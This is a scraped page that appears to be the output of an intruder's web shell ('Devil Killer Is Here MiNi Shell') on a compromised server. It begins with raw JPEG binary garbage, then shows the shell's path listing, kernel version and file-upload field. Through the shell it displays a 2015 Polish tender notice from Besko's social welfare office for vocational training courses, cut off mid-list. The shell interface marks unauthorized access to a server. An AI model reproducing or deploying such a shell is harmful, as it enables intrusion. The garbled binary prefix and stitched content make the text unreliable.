JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150304/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150304/30153-N-2015.html

<p class="kh_header"><b>Besko: Kompleksowe zorganizowanie i przeprowadzenie kursów zawodowych w ramach projektu systemowego Czas na aktywność w Gminie Besko.</b><br>
<b>Numer ogłoszenia: 30153 - 2015; data zamieszczenia: 04.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej w Besku , ul. Podkarpacka 5, 38-524 Besko, woj. podkarpackie, tel. 13 4673318, faks 13 4673318.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.gops.besko.pl/asp/pl_start.asp?ref=1&typ=13&menu=3&strona=1</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowe zorganizowanie i przeprowadzenie kursów zawodowych w ramach projektu systemowego Czas na aktywność w Gminie Besko..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje w szczególności: 1.Zamówienie realizowane jest w ramach projektu systemowego Czas na aktywność w gminie Besko realizowanego w ramach PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI PRIORYTET VII Promocja integracji społecznej DZIAŁANIE 7.1 Rozwój i upowszechnianie aktywnej integracji PODDZIAŁANIE 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej, dofinansowanego ze środków UNII EUROPEJSKIEJ w ramach EUROPEJSKIEGO FUNDUSZU SPOŁECZNEGO. 2.Przedmiotem zamówienia jest kompleksowe zorganizowanie i przeprowadzenie kursów zawodowych w ramach projektu systemowego Czas na aktywność w gminie Besko 3.Zamówienie obejmuje przeprowadzenie kursów w zakresie: I) Kurs: kucharz - ciastkarz z elementami Cateringu, 1) Liczba uczestników: 2 osoby 2) Czas trwania: minimum 120 godzin edukacyjnych (1 godzina zajęć równa jest 45 minutom) realizowanych od poniedziałku do piątku między godziną 8 a 17, obejmujących nie więcej niż 8 godzin zegarowych dziennie, do których wlicza się zarówno czas realizacji zajęć edukacyjnych, jak i przerwy między zajęciami nie później niż do godz.17.00.Zamawiający wymaga, aby większość godzin zegarowych w planie nauczania obejmowała zajęcia praktyczne. 3) Termin realizacji: od dnia podpisania umowy do 20.06.2015r. Dokładny termin rozpoczęcia kursu Zamawiający ustali z Wykonawcą zamówienia. 4) Cel szkolenia: nabycie wiedzy oraz umiejętności w zakresie obejmującym wykonywanie zawodu kucharz -ciastkarz z elementami Cateringu . 5) Zakres: kurs obejmuje blok teoretyczno-praktyczny minimum 120 godzin mający na celu przekazanie słuchaczom wiedzy i umiejętności niezbędnych w planowaniu produkcji, klasyfikacji surowców gastronomicznych i ciastkarskich, BHP, obsługa maszyn i urządzeń, obróbka wstępna surowców, technika sporządzania dań, wypiek ciast, desery i napoje, potrawy okolicznościowe, regionalne i narodowe, potrawy dietetyczne w poszczególnych jednostkach chorobowych, ekspedycja wyrobów kulinarnych oraz niezbędne zagadnienia do organizowania i obsługi przyjęć okolicznościowych. 6) Wymagania: 1.Zapewnienie kadry dydaktycznej posiadającej kwalifikacje zawodowe odpowiednie do prowadzenia zajęć objętych programem nauczania kursu- kucharz - ciastkarz. 2.Program nauczania szkolenia zawierający w szczególności: czas trwania i sposób organizacji kursu, cele kształcenia a także plan nauczania określający nazwę zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem części teoretycznej i praktycznej oraz wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych, 3.Zapewnienie materiałów i pomocy dydaktycznych (podręczników i poradników) potrzebnych do przyswojenia wiedzy teoretycznej a także zapewnienie dla każdego uczestnika szkolenia na realizację zajęć praktycznych niezbędnych materiałów których zakup zostanie potwierdzony fakturą oraz innych materiałów szkoleniowych i sprzętu niezbędnego do zajęć. 4.Zapewnienie odpowiedniego miejsca prowadzenia zajęć teoretycznych i praktycznych wyposażonego w sprzęt i pomoce dydaktyczne umożliwiające prawidłową realizację kształcenia każdemu uczestnikowi szkolenia, oddzielnego stanowiska pracy, zapewniające bezpieczne i higieniczne warunki pracy i nauki. Realizacja zajęć praktycznych musi być prowadzona w pracowniach gastronomicznych. Dopuszcza się przeprowadzenie zajęć (do 25 km ) poza terenem Gminy Besko. Koszt dojazdu uczestnika na zajęcia i powrotu pokrywać będzie Wykonawca zamówienia. W ofercie należy dokładnie wskazać miejsce, w którym będą odbywać się zajęcia. 5.Wykonawca jest zobowiązany do sfinansowania kosztów przeprowadzenia niezbędnych badań lekarskich (przeprowadzonych przez lekarza medycyny pracy mających na celu stwierdzenie zdolności do odbycia kursu oraz podjęcia zatrudnienia zgodnego z kierunkiem szkolenia), jeżeli specyfika kursu tego wymaga. Koszt badań należy uwzględnić w ogólnej cenie kursu. 6.Wykonawca jest zobowiązany przekazać Zamawiającemu po jednym egzemplarzu materiałów szkoleniowych i dydaktycznych (wymaganych przez podmioty kontrolujące), 7. Wykonawca jest zobowiązany ubezpieczyć uczestników szkolenia od następstw nieszczęśliwych wypadków powstałych w trakcie oraz w drodze do i z miejsca szkolenia - od pierwszego do ostatniego dnia szkolenia, (kserokopia polisy potwierdzoną za zgodność z oryginałem należy przekazać Zamawiającemu przed rozpoczęciem szkolenia) 8.Wykonawca zapewni każdego dnia uczestnikom szkolenia catering, w postaci ciepłych i zimnych napojów (kawa, herbata, soki, woda wg potrzeb uczestników), ciastka oraz gorący posiłek (II danie obiadowe) w przypadku zajęć powyżej 6 godz. 9. Wykonawca prowadzić będzie bieżącą dokumentację przebiegu kształcenia (m.in. listy obecności uczestników zajęć - potwierdzanie obecności za pomocą własnoręcznego czytelnego podpisu, potwierdzenia odbioru materiałów szkoleniowych, potwierdzenia otrzymania zimnego oraz gorącego poczęstunku w postaci dania obiadowego, potwierdzenia odbycia kursu BHP) a po zakończeniu kursu przekazania kserokopii tych dokumentów Zamawiającemu wraz z zaświadczeniami potwierdzającymi ukończenie kursu (z odpowiednim oznakowaniem promocyjnym) 10. Wykonawca niezwłoczne poinformuje Zamawiającego (najpóźniej w następnym dniu od zaistniałej sytuacji) o absencji uczestników szkolenia lub rezygnacji z uczestnictwa w trakcie jego trwania a także innych okoliczności mających wpływ na realizację programu nauczania. Zgłoszenie o nieobecności uczestników powinny być dokonane telefonicznie lub e-mailowo do koordynatora projektu. 11. Wykonawca powiadomi Zamawiającego, na co najmniej 3 dni przed terminem zakończenia szkolenia, o dacie i godzinie egzaminu sprawdzającego wiadomości i umiejętności uczestników i umożliwienie Zamawiającemu uczestnictwo w egzaminie w charakterze obserwatora, 12. Wykonawca sprawdzi wiadomości i umiejętności z poszczególnych zajęć edukacyjnych przewidzianych w programie nauczania tego szkolenia i wydanie egzemplarza imiennego zaświadczenia lub certyfikatu potwierdzającego ukończenie szkolenia (z odpowiednim oznakowaniem promocyjnym). Potwierdzoną za zgodność kopię w/w dokumentu Wykonawca jest zobowiązany przekazać Zamawiającemu w terminie 3 dni od ukończenia kursu 13. Wykonawca przeprowadzi krótki instruktarzu BHP na początku szkolenia. 14. Wykonawca przekaże Zamawiającemu harmonogramu zajęć wraz z godzinami rozpoczęcia i zakończenia szkolenia na 4 dni przed rozpoczęciem kursu. 15. Wykonawca musi przed rozpoczęciem kursu oznakować pomieszczenie, materiały szkoleniowe i środki techniczne zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki 16. Po zakończeniu szkolenia Wykonawca zobowiązany jest do wydania uczestnikom szkolenia dokumentu potwierdzającego jego ukończenie - zaświadczenie, o którym mowa w § 18 ust. 2 rozporządzenia Ministra Edukacji i Nauki z dnia 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. z 2014 r., poz. 622) oraz suplement zawierający: 1. informacje o okresie trwania szkolenia, 2. tematy i wymiar godzinowy zajęć edukacyjnych, 3. numer z rejestru zaświadczenia, do którego suplement jest dodatkiem, 4. podpis osoby upoważnionej przez instytucję szkoleniową prowadzącą szkolenie. Zaświadczenia muszą być oznaczone zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki. II ) Kurs: Magazynier z obsługą wózka widłowego, kasy fiskalnej 1) Liczba uczestników:1 osoba. 2) Czas trwania: minimum 120 godzin edukacyjnych (1 godzina zajęć równa jest 45 minutom) realizowanych od poniedziałku do piątku między godziną 8 a 17, obejmujących nie więcej niż 8 godzin zegarowych dziennie, do których wlicza się zarówno czas realizacji zajęć edukacyjnych, jak i przerwy między zajęciami nie później niż do godz.17.00. Zamawiający wymaga, aby większość godzin zegarowych w planie nauczania obejmowała zajęcia praktyczne 3) Termin realizacji: od dnia podpisania umowy do 20.06.2015r. Dokładny termin rozpoczęcia kursu Zamawiający ustali z Wykonawcą zamówienia. 4) Cel szkolenia: nabycie wiedzy oraz umiejętności w zakresie obejmującym wykonywanie zawodu Magazynier z obsługą wózka widłowego, kasy fiskalnej. 5) Wymagania, zakres kursu: 1.Zapewnienie kadry dydaktycznej posiadającej kwalifikacje zawodowe odpowiednie do prowadzenia zajęć objętych programem nauczania kursu Magazynier z obsługą wózka widłowego, kasy fiskalnej. 2.Program nauczania szkolenia zawierający w szczególności: czas trwania i sposób organizacji kursu, cele kształcenia a także plan nauczania określający nazwę zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem części teoretycznej i praktycznej oraz wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych, 3.Zapewnienie materiałów i pomocy dydaktycznych (podręczników i poradników potrzebnych do przyswojenia wiedzy teoretycznej a także innych materiałów szkoleniowych i sprzętu niezbędnego do zajęć (np. zeszyt, długopis, itp.), które przejdą na własność uczestników kursu. 4.Zapewnienie odpowiedniego miejsca prowadzenia zajęć teoretycznych i praktycznych wyposażonego w sprzęt i pomoce dydaktyczne umożliwiające prawidłową realizację kształcenia uczestnikowi szkolenia, oddzielnego stanowiska pracy, zapewniające bezpieczne i higieniczne warunki pracy i nauki. Dopuszcza się przeprowadzenie zajęć (do 25 km ) poza terenem Gminy. Koszt dojazdu uczestników na zajęcia i z powrotem pokrywać będzie Wykonawca zamówienia. W ofercie należy dokładnie wskazać miejsce, w którym będą odbywać się zajęcia. 5.Wykonawca jest zobowiązany do sfinansowania kosztów przeprowadzenia niezbędnych badań lekarskich (przeprowadzonych przez lekarza medycyny pracy mających na celu stwierdzenie zdolności do odbycia kursu oraz podjęcia zatrudnienia zgodnego z kierunkiem szkolenia), jeżeli specyfika kursu tego wymaga. Koszt należy uwzględnić w ogólnej cenie kursu. 6. Przekazanie Zamawiającemu po jednym egzemplarzu materiałów szkoleniowych i dydaktycznych (wymaganych przez podmioty kontrolujące); 7.Ubezpieczenie uczestników szkolenia od następstw nieszczęśliwych wypadków powstałych w trakcie oraz w drodze do i z miejsca szkolenia - od pierwszego do ostatniego dnia szkolenia, (kserokopia polisy potwierdzoną za zgodność z oryginałem należy przekazać Zamawiającemu przed rozpoczęciem szkolenia); 8.Zapewnienie każdego dnia cateringu, w postaci ciepłych i zimnych napojów (kawa, herbata, soki, woda wg potrzeb uczestników), ciastek oraz gorącego posiłku (II danie obiadowe) w przypadku gdy zajęcia trwają 6 i więcej godz. 9.Prowadzenie bieżącej dokumentacji przebiegu kształcenia (m.in. listy obecności uczestników zajęć - potwierdzanie obecności za pomocą własnoręcznego czytelnego podpisu, potwierdzenia odbioru materiałów szkoleniowych, potwierdzenia otrzymania zimnego oraz gorącego poczęstunku w postaci gorącego posiłku, potwierdzenia odbycia kursu BHP) a po zakończeniu kursu przekazania kserokopii tych dokumentów Zamawiającemu wraz z zaświadczeniami potwierdzającymi ukończenie kursu (z odpowiednim oznakowaniem promocyjnym); 10. Niezwłoczne poinformowanie Zamawiającego (najpóźniej w następnym dniu od zaistniałej sytuacji) o absencji uczestników szkolenia lub rezygnacji z uczestnictwa w trakcie jego trwania a także innych okoliczności mających wpływ na realizację programu nauczania. Zgłoszenia o nieobecności uczestników powinny być dokonane telefonicznie lub e-mailowo do koordynatora projektu. 11.Powiadomienie Zamawiającego, na co najmniej 3 dni przed terminem zakończenia szkolenia, o dacie i godzinie egzaminu sprawdzającego wiadomości i umiejętności uczestników i umożliwienie Zamawiającemu uczestnictwo w egzaminie w charakterze obserwatora, 12.Sprawdzenie wiadomości i umiejętności z poszczególnych zajęć edukacyjnych przewidzianych w programie nauczania tego szkolenia i wydanie egzemplarza imiennego zaświadczenia lub certyfikatu potwierdzającego ukończenie szkolenia (z odpowiednim oznakowaniem promocyjnym). Potwierdzoną za zgodność kopię w/w dokumentu Wykonawca jest zobowiązany przekazać Zamawiającemu w terminie 3 dni od ukończenia kursu; 13.Przeprowadzenie krótkiego instruktarzu BHP na początku szkolenia, 14.Przekazywanie Zamawiającemu harmonogramu zajęć wraz z godzinami rozpoczęcia i zakończenia szkolenia na 4 dni przed rozpoczęciem kursu. 15.Wykonawca musi przed rozpoczęciem kursu oznakować pomieszczenie, materiały szkoleniowe i środki techniczne, wszystkie dokumenty sporządzone na potrzeby kursu zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki . 16. Po zakończeniu szkolenia Wykonawca zobowiązany jest do wydania uczestnikom szkolenia dokumentu potwierdzającego jego ukończenie - zaświadczenie, o którym mowa w § 18 ust. 2 rozporządzenia Ministra Edukacji i Nauki z dnia 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. z 2014 r., poz. 622) oraz suplement zawierający: 1. informacje o okresie trwania szkolenia, 2. tematy i wymiar godzinowy zajęć edukacyjnych, 3. numer z rejestru zaświadczenia, do którego suplement jest dodatkiem, 4. podpis osoby upoważnionej przez instytucję szkoleniową prowadzącą szkolenie. Zaświadczenia muszą być oznaczone zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki. Wykonawca jest zobowiązany wydać uczestnikom szkolenia po pozytywnym wyniku egzaminu przeprowadzonego przez UDT - zezwolenie na prowadzenie wózka widłowego. UWAGA: Szkolenie powinno zakończyć się egzaminem przeprowadzonym przez Urząd Dozoru Technicznego, co Wykonawca zobowiązuje się zapewnić w ramach realizacji przedmiotu umowy. III ) Kurs Drwal - Operator Pilarki Spalinowej  1) Liczba uczestników: 1 osoba. 2) Czas trwania: minimum 140 godzin edukacyjnych (1 godzina zajęć równa jest 45 minutom) realizowanych od poniedziałku do piątku między godziną 8 a 17, obejmujących nie więcej niż 8 godzin zegarowych dziennie, do których wlicza się zarówno czas realizacji zajęć edukacyjnych, jak i przerwy między zajęciami nie później niż do godz.17.00. Zamawiający wymaga, aby większość godzin zegarowych w planie nauczania obejmowała zajęcia praktyczne. 3) Termin realizacji: od dnia podpisania umowy do 20.06.2015r. Dokładny termin rozpoczęcia kursu Zamawiający ustali z Wykonawcą zamówienia. 4) Cel szkolenia: nabycie i opanowanie przez 1 uczestnika podstawowych umiejętności z zakresu: zasady działania pilarki spalinowej, jej obsługi oraz konserwacji zapewniającej sprawne działanie urządzenia oraz bezpieczeństwo użytkowania; technik pracy pilarką spalinową.
Zakres tematyczny obejmuje: zasady bezpieczeństwa i higieny pracy pilarką spalinową; paliwa, oleje i smary używane w eksploatacji pilarki; budowa pilarki, przygotowanie do pracy oraz utrzymanie odpowiedniego stanu technicznego; narzędzia i sprzęt pomocniczy do pozyskania drewna; techniki ścinki i obalania drzew normalnych i tzw. trudnych; okrzesywanie drzew ściętych; przerzynka drewna; zasady organizacji procesu pozyskania drewna.5.Wymagania, zakres kursu 1.Zapewnienie kadry dydaktycznej posiadającej kwalifikacje zawodowe odpowiednie do prowadzenia zajęć objętych programem nauczania kursu Drwal - Operator Pilarki Spalinowej. 2.Program nauczania szkolenia zawierający w szczególności: czas trwania i sposób organizacji kursu, cele kształcenia a także plan nauczania określający nazwę zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem części teoretycznej i praktycznej oraz wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych, 3.Zapewnienie materiałów i pomocy dydaktycznych (podręczników i poradników potrzebnych do przyswojenia wiedzy teoretycznej a także innych materiałów szkoleniowych i sprzętu niezbędnego do zajęć. 4.Zapewnienie odpowiedniego miejsca prowadzenia zajęć teoretycznych i praktycznych wyposażonego w sprzęt i pomoce dydaktyczne umożliwiające prawidłową realizację kształcenia uczestnikowi szkolenia, oddzielnego stanowiska pracy, zapewniające bezpieczne i higieniczne warunki pracy i nauki. Dopuszcza się przeprowadzenie zajęć (do 25 km ) poza terenem Gminy. Koszt dojazdu uczestników na zajęcia i z powrotem pokrywać będzie Wykonawca zamówienia. W ofercie należy dokładnie wskazać miejsce, w którym będą odbywać się zajęcia. 5.Wykonawca jest zobowiązany do sfinansowania kosztów przeprowadzenia niezbędnych badań lekarskich (przeprowadzonych przez lekarza medycyny pracy mających na celu stwierdzenie zdolności do odbycia kursu oraz podjęcia zatrudnienia zgodnego z kierunkiem szkolenia), jeżeli specyfika kursu tego wymaga. Koszt należy uwzględnić w ogólnej cenie kursu. 6.Przekazanie Zamawiającemu po jednym egzemplarzu materiałów szkoleniowych i dydaktycznych (wymaganych przez podmioty kontrolujące), 7.Ubezpieczenie uczestników szkolenia od następstw nieszczęśliwych wypadków powstałych w trakcie oraz w drodze do i z miejsca szkolenia - od pierwszego do ostatniego dnia szkolenia, (kserokopia polisy potwierdzoną za zgodność z oryginałem należy przekazać Zamawiającemu przed rozpoczęciem szkolenia) 8.Zapewnienie każdego dnia cateringu, w postaci ciepłych i zimnych napojów (kawa, herbata, soki, woda wg potrzeb uczestników), ciastek oraz gorącego posiłku (II danie obiadowe) w przypadku gdy zajęcia trwają 6 i więcej godz. 9.Prowadzenie bieżącej dokumentacji przebiegu kształcenia (m.in. listy obecności uczestników zajęć - potwierdzanie obecności za pomocą własnoręcznego czytelnego podpisu, potwierdzenia odbioru materiałów szkoleniowych, potwierdzenia otrzymania zimnego oraz gorącego poczęstunku w postaci gorącego posiłku, potwierdzenia odbycia kursu BHP) a po zakończeniu kursu przekazania kserokopii tych dokumentów Zamawiającemu wraz z zaświadczeniami potwierdzającymi ukończenie kursu (z odpowiednim oznakowaniem promocyjnym) ; 10.Niezwłoczne poinformowanie Zamawiającego (najpóźniej w następnym dniu od zaistniałej sytuacji) o absencji uczestników szkolenia lub rezygnacji z uczestnictwa w trakcie jego trwania a także innych okoliczności mających wpływ na realizację programu nauczania. Zgłoszenia o nieobecności uczestników powinny być dokonane telefonicznie lub e-mailowo do koordynatora projektu. 11.Powiadomienie Zamawiającego, na co najmniej 3 dni przed terminem zakończenia szkolenia, o dacie i godzinie egzaminu sprawdzającego wiadomości i umiejętności uczestników i umożliwienie Zamawiającemu uczestnictwo w egzaminie w charakterze obserwatora, 12.Sprawdzenie wiadomości i umiejętności z poszczególnych zajęć edukacyjnych przewidzianych w programie nauczania tego szkolenia i wydanie egzemplarza imiennego zaświadczenia lub certyfikatu potwierdzającego ukończenie szkolenia (z odpowiednim oznakowaniem promocyjnym). Potwierdzoną za zgodność kopię w/w dokumentu Wykonawca jest zobowiązany przekazać Zamawiającemu w terminie 3 dni od ukończenia kursu; 13.Przeprowadzenie krótkiego instruktarzu BHP na początku szkolenia; 14.Przekazywanie Zamawiającemu harmonogramu zajęć wraz z godzinami rozpoczęcia i zakończenia szkolenia na 4 dni przed rozpoczęciem kursu. 15.Wykonawca musi przed rozpoczęciem kursu oznakować pomieszczenie, materiały szkoleniowe i środki techniczne, wszystkie dokumenty sporządzone na potrzeby kursu zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki . 16.Po zakończeniu szkolenia uczestnicy otrzymają dokumenty potwierdzające jego ukończenie - zaświadczenie, o którym mowa w § 18 ust. 2 rozporządzenia Ministra Edukacji i Nauki z dnia 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. z 2014 r., poz. 622) oraz suplement zawierający: 1. informacje o okresie trwania szkolenia, 2. tematy i wymiar godzinowy zajęć edukacyjnych, 3. numer z rejestru zaświadczenia, do którego suplement jest dodatkiem, 4. podpis osoby upoważnionej przez instytucję szkoleniową prowadzącą szkolenie. Zaświadczenia muszą być oznaczone zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki. IV)Kurs - Sprzedawca z obsługa pakietu MS Office oraz programu magazynowego 1) Liczba uczestników: 1 osoba 2) Czas trwania: minimum 140 godzin edukacyjnych (1 godzina zajęć równa jest 45 minutom) realizowanych od poniedziałku do piątku między 8 i 17, obejmujących nie więcej niż 8 godzin zegarowych dziennie, do których wlicza się zarówno czas realizacji zajęć edukacyjnych, jak i przerwy między zajęciami nie później niż do godz.17.00. Zamawiający wymaga, aby większość godzin zegarowych w planie nauczania obejmowała zajęcia praktyczne. 3) Termin realizacji : od dnia podpisania umowy do 20 czerwca  2015r. Dokładny termin rozpoczęcia kursu Zamawiający ustali z Wykonawcą zamówienia. 4) Cel szkolenia: nabycie wiedzy oraz umiejętności obejmującej skuteczne techniki sprzedaży oraz techniki postępowania w sytuacjach handlowych, a także umiejętność obsługi programu magazynowego. 5)Wymagania, zakres kursu: 1.Zapewnienie kadry dydaktycznej posiadającej kwalifikacje zawodowe odpowiednie do prowadzenia zajęć objętych programem nauczania kursu Sprzedawca z obsługa pakietu MS Office oraz programu magazynowego; 2.Program nauczania szkolenia zawierający w szczególności: czas trwania i sposób organizacji kursu, cele kształcenia a także plan nauczania określający nazwę zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem części teoretycznej i praktycznej oraz wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych, 3.Zapewnienie materiałów i pomocy dydaktycznych (podręczników i poradników potrzebnych do przyswojenia wiedzy teoretycznej a także innych materiałów szkoleniowych i sprzętu niezbędnego do zajęć. 4.Zapewnienie odpowiedniego miejsca prowadzenia zajęć teoretycznych i praktycznych wyposażonego w sprzęt i pomoce dydaktyczne umożliwiające prawidłową realizację kształcenia uczestnikowi szkolenia oddzielnego stanowiska pracy, zapewniające bezpieczne i higieniczne warunki pracy i nauki. Dopuszcza się przeprowadzenie zajęć (do 25 km ) poza terenem Gminy. Koszt dojazdu uczestników na zajęcia i z powrotem pokrywać będzie Wykonawca zamówienia. W ofercie należy dokładnie wskazać miejsce, w którym będą odbywać się zajęcia. 5.Wykonawca jest zobowiązany do sfinansowania kosztów przeprowadzenia niezbędnych badań lekarskich (przeprowadzonych przez lekarza medycyny pracy mających na celu stwierdzenie zdolności do odbycia kursu oraz podjęcia zatrudnienia zgodnego z kierunkiem szkolenia), jeżeli specyfika kursu tego wymaga. Koszt należy uwzględnić w ogólnej cenie kursu. 6. Przekazanie Zamawiającemu po jednym egzemplarzu materiałów szkoleniowych i dydaktycznych (wymaganych przez podmioty kontrolujące), 7.Ubezpieczenie uczestników szkolenia od następstw nieszczęśliwych wypadków powstałych w trakcie oraz w drodze do i z miejsca szkolenia - od pierwszego do ostatniego dnia szkolenia, (kserokopia polisy potwierdzoną za zgodność z oryginałem należy przekazać Zamawiającemu przed rozpoczęciem szkolenia); 8. Zapewnienie każdego dnia cateringu, w postaci ciepłych i zimnych napojów (kawa, herbata, soki, woda wg potrzeb uczestników), ciastek oraz gorącego posiłku (II danie obiadowe) w przypadku gdy zajęcia trwają 6 i więcej godz. 9. Prowadzenie bieżącej dokumentacji przebiegu kształcenia 